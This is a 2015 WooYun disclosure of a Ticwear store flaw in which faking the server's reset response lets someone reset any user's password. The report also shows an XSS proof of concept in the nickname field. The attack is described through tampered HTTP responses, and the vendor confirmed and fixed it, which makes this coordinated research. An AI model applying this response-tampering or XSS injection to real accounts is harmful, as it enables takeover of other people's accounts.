当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0165440

漏洞标题:Ticwear商城设计缺陷重置任意用户密码(以18888888888为例)

相关厂商:ticwear.com

漏洞作者: 牛 小 帅

提交时间:2015-12-28 16:24

修复时间:2016-01-23 17:48

公开时间:2016-01-23 17:48

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-28: 细节已通知厂商并且等待厂商处理中
2015-12-29: 厂商已经确认,细节仅向厂商公开
2016-01-08: 细节向核心白帽子及相关领域专家公开
2016-01-18: 细节向普通白帽子公开
2016-01-23: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

Ticwear商城设计缺陷重置任意用户密码(以18888888888为例)

详细说明:

很简单的一个问题
站点
http://store.ticwear.com/pages/info
我们来到找回密码页面
以18888888888为例
不用获取验证码,直接输入算了

28)I_~6QL3A1%$4}QPTYCNP.png


接下来是重点
==============================
错误返回包:

HTTP/1.1 200 OK
Server: ngx_openresty/1.4.1.1
Date: Mon, 28 Dec 2015 07:05:48 GMT
Content-Type: application/json; charset=UTF-8
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Request-Method: *
Content-Length: 81
{"redirect_url":"","err_msg":"éªŒè¯ç å·²è¿‡æœŸ","err_code":-1,"status":"error"}


==============================================
正确返回包:

HTTP/1.1 200 OK
Server: ngx_openresty/1.4.1.1
Date: Mon, 28 Dec 2015 07:05:48 GMT
Content-Type: application/json; charset=UTF-8
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Request-Method: *
Content-Length: 81
{"redirect_url":"","err_msg":"éªŒè¯ç å·²è¿‡æœŸ","err_code":0,"status":"success"}


==========================================================
ok
密码设置为12345678

M{IXF_KPS3M1%3SQ%APBK[D.png


登入看看吧,发现是哪个白帽子搞过的号

G[2TX}_YS2%Z22EGEEAJV[0.png


哈哈这种方式是我最拿手的
最后送一个未知错误,好像是xss引起的
这里查看源代码是原输出,未做任何处理

<li><span class="form_l">昵称:</span><input type="text" value="">1.<script>alert(1)</script><!-"


}VSL`RVMS4O}_AQ5VR1ZZ~Q.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 牛 小 帅@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-29 10:23

厂商回复:

多谢白帽工程师 路人甲

最新状态:

2016-01-23:已修复 多谢白帽工程师 路人甲


漏洞评价:

评价

  1. 2016-02-06 08:56 | 我在不想理你 ( 路人 | Rank:22 漏洞数:10 | 人生路漫漫)

    前台验证?